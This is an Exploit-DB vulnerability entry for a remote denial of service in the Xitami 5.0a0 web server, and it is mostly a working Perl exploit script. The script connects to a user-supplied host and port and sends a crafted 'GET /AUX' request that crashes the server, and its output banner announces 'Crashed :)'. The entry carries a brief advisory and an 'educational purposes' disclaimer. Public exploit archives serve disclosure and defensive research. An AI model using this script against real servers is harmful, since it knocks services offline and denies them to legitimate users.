Xitami 5.0 – ‘/AUX’ Request Remote Denial of Service

  • 作者: Usman Saeed
    日期: 2010-05-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/33968/
  • source: https://www.securityfocus.com/bid/40027/info
    
    Xitami is prone to a denial-of-service vulnerability.
    
    Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
    
    Xitami 5.0a0 is vulnerable. 
    
    #!/usr/bin/perl
    # Xitami/5.0a0 Denial Of Service
    # Disclaimer:
    # [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]
    # Author: Usman Saeed
    # Company: Xc0re Security Research Group
    # Website: http://www.xc0re.net
    # DATE: [10/05/10]
    
    $host = $ARGV[0];
    $PORT = $ARGV[1];
    
    $packet = "AUX"; 
    
    
    $stuff = "GET /".$packet." HTTP/1.0\r\n\r\n";
    
    
    
    use IO::Socket::INET;
    if (! defined $ARGV[0])
    {
    print "+========================================================+\n";
    print "+ Program [Xitami/5.0a0 Denial Of Service] +\n";
    print "+ Author [Usman Saeed] +\n";
    print "+ Company [Xc0re Security Research Group]+\n";
    print "+ DATE: [10/05/10] +\n";
    print "+ Usage :perl sploit.pl webserversip wbsvrport +\n";
    print "+ Disclaimer: [This code is for Educational Purposes , +\n";
    print "+ I would Not be responsible for any misuse of this code]+\n";
    print "+========================================================+\n";
    
    
    
    
    
    exit;
    }
    
    
    $sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr=> $host , PeerPort=> $PORT) || die "Cant connect to $host!";
    print "+========================================================+\n";
    print "+ Program [Xitami/5.0a0 Denial Of Service] +\n";
    print "+ Author [Usman Saeed] +\n";
    print "+ Company [Xc0re Security Research Group]+\n";
    print "+ DATE: [10/05/10] +\n";
    print "+ Usage :perl sploit.pl webserversip wbsvrport +\n";
    print "+ Disclaimer: [This code is for Educational Purposes , +\n";
    print "+ I would Not be responsible for any misuse of this code]+\n";
    print "+========================================================+\n";
    
    
    
    
    print "\n";
    
    print "[*] Initializing\n";
    
    sleep(2);
    
    print "[*] Sendin DOS Packet \n";
    
    send ($sock , $stuff , 0);
    print "[*] Crashed :) \n";
    $res = recv($sock,$response,1024,0);
    print $response;
    
    
    
    exit;